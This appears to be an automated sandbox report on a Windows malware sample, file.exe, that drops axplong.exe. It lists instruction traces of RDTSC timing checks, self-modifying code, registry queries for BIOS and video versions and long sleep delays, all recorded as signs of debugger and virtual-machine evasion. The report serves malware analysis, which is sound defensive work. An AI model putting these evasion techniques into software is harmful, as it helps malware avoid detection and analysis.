                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E504C2 second address: 4E504C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E504C7 second address: 4E5056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F389CFCC954h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F389CFCC94Bh 0x0000000f jmp 00007F389CFCC953h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b jmp 00007F389CFCC956h 0x00000020 and dword ptr [eax], 00000000h 0x00000023 pushad 0x00000024 pushad 0x00000025 push esi 0x00000026 pop ebx 0x00000027 mov eax, 583E51CFh 0x0000002c popad 0x0000002d call 00007F389CFCC954h 0x00000032 pushfd 0x00000033 jmp 00007F389CFCC952h 0x00000038 xor cx, 0FA8h 0x0000003d jmp 00007F389CFCC94Bh 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 and dword ptr [eax+04h], 00000000h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5056C second address: 4E5057C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5057C second address: 4E505CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389CFCC951h 0x00000009 sub ecx, 4FB42276h 0x0000000f jmp 00007F389CFCC951h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F389CFCC959h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304BC second address: 4E304C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304C2 second address: 4E304D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304D1 second address: 4E304D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304D5 second address: 4E304DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304DB second address: 4E304F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304F2 second address: 4E3054D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389CFCC952h 0x00000009 adc ah, 00000058h 0x0000000c jmp 00007F389CFCC94Bh 0x00000011 popfd 0x00000012 mov eax, 3473470Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F389CFCC952h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F389CFCC957h 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50041 second address: 4E500C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389C83839Fh 0x00000009 jmp 00007F389C8383A3h 0x0000000e popfd 0x0000000f push ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007F389C8383A5h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov si, D503h 0x00000020 mov ax, BE5Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F389C8383A7h 0x0000002f pop esi 0x00000030 jmp 00007F389C8383A9h 0x00000035 popad 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E500C5 second address: 4E500CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E500CB second address: 4E500CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50298 second address: 4E5029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5029C second address: 4E502A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502A2 second address: 4E502A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502A8 second address: 4E502AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502AC second address: 4E502C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F389CFCC94Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502C9 second address: 4E502CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502CD second address: 4E502D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502D3 second address: 4E5030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F389C8383A0h 0x00000008 pop ecx 0x00000009 call 00007F389C83839Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 jmp 00007F389C83839Fh 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5030E second address: 4E50312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50312 second address: 4E50316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50316 second address: 4E5031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5031C second address: 4E50322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50322 second address: 4E50326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70756 second address: 4E7078A instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1C718663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F389C8383A9h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F389C83839Dh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7078A second address: 4E707BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 05A2h 0x00000007 call 00007F389CFCC953h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 call 00007F389CFCC94Eh 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70923 second address: 4E70936 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 3Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70936 second address: 4E7093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7093B second address: 4E70968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, FEh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F38A0918CE5h 0x00000012 mov edi, edi 0x00000014 jmp 00007F389C8383A4h 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, 3CD0h 0x00000021 mov ax, dx 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70968 second address: 4E709CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F389CFCC950h 0x00000008 pop ecx 0x00000009 call 00007F389CFCC94Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 call 00007F389CFCC954h 0x00000019 mov dh, cl 0x0000001b pop edx 0x0000001c pushfd 0x0000001d jmp 00007F389CFCC94Ch 0x00000022 add al, FFFFFFA8h 0x00000025 jmp 00007F389CFCC94Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov di, B416h 0x00000034 movsx edx, ax 0x00000037 popad 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E709CD second address: 4E70A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F389C83839Bh 0x0000000b sub ecx, 4910709Eh 0x00000011 jmp 00007F389C8383A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F389C83839Dh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20074 second address: 4E2008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC954h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2008C second address: 4E20090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20090 second address: 4E200DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F389CFCC94Eh 0x00000018 xor al, 00000078h 0x0000001b jmp 00007F389CFCC94Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F389CFCC955h 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E200DB second address: 4E2019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389C8383A7h 0x00000009 xor ah, FFFFFF9Eh 0x0000000c jmp 00007F389C8383A9h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F389C83839Ah 0x0000001d push eax 0x0000001e jmp 00007F389C83839Bh 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushfd 0x00000028 jmp 00007F389C8383A0h 0x0000002d and ecx, 4A2803F8h 0x00000033 jmp 00007F389C83839Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebx, dword ptr [ebp+10h] 0x0000003d jmp 00007F389C8383A6h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F389C83839Dh 0x0000004c xor cx, F346h 0x00000051 jmp 00007F389C8383A1h 0x00000056 popfd 0x00000057 mov ch, 51h 0x00000059 popad 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2019C second address: 4E201A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201A2 second address: 4E201A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201A6 second address: 4E201BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389CFCC94Eh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201BF second address: 4E201C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201C5 second address: 4E201C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201C9 second address: 4E201F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F389C8383A9h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201F3 second address: 4E201FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 58h 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201FA second address: 4E20220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F389C8383A6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20220 second address: 4E2023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC958h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2023C second address: 4E20242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20242 second address: 4E20246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20246 second address: 4E20311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F389C83839Ch 0x00000013 jmp 00007F389C8383A5h 0x00000018 popfd 0x00000019 pushad 0x0000001a mov edi, eax 0x0000001c pushfd 0x0000001d jmp 00007F389C83839Ah 0x00000022 add ax, 2E28h 0x00000027 jmp 00007F389C83839Bh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f test esi, esi 0x00000031 pushad 0x00000032 call 00007F389C8383A4h 0x00000037 call 00007F389C8383A2h 0x0000003c pop esi 0x0000003d pop ebx 0x0000003e jmp 00007F389C8383A0h 0x00000043 popad 0x00000044 je 00007F390E9466D0h 0x0000004a jmp 00007F389C8383A0h 0x0000004f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F389C8383A7h 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20311 second address: 4E20317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20317 second address: 4E20342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F390E9466A2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F389C8383A9h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20342 second address: 4E20346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20346 second address: 4E2034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2034C second address: 4E2037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F389CFCC956h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [esi+44h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F389CFCC94Ah 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2037C second address: 4E20380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20380 second address: 4E20386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20386 second address: 4E203B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F389C8383A7h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E203B4 second address: 4E203DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edx, 2FB27D6Ch 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E203DF second address: 4E2043D instructions: 0x00000000 rdtsc 0x00000002 call 00007F389C8383A5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F390E946624h 0x00000011 jmp 00007F389C8383A7h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a jmp 00007F389C8383A6h 0x0000001f jne 00007F390E946606h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2043D second address: 4E2045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2045A second address: 4E20460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10807 second address: 4E1080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1080B second address: 4E10811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10811 second address: 4E10829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC954h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10829 second address: 4E1087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F389C83839Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F389C8383A0h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F389C8383A0h 0x0000001d and esp, FFFFFFF8h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F389C8383A7h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1087F second address: 4E10899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b mov bh, C1h 0x0000000d pop eax 0x0000000e mov di, F456h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDEA29 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F911DA instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDC252 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 79EA29 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 9511DA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 79C252 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04EA00CF rdtsc 0_2_04EA00CF
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1240Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1247Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 408Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1255Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1243Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7600Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7600Thread sleep time: -68034s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7572Thread sleep count: 1240 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7572Thread sleep time: -2481240s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7588Thread sleep count: 1247 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7588Thread sleep time: -2495247s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7560Thread sleep count: 408 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7560Thread sleep time: -12240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7676Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7592Thread sleep count: 1255 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7592Thread sleep time: -2511255s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7596Thread sleep count: 1243 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7596Thread sleep time: -2487243s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
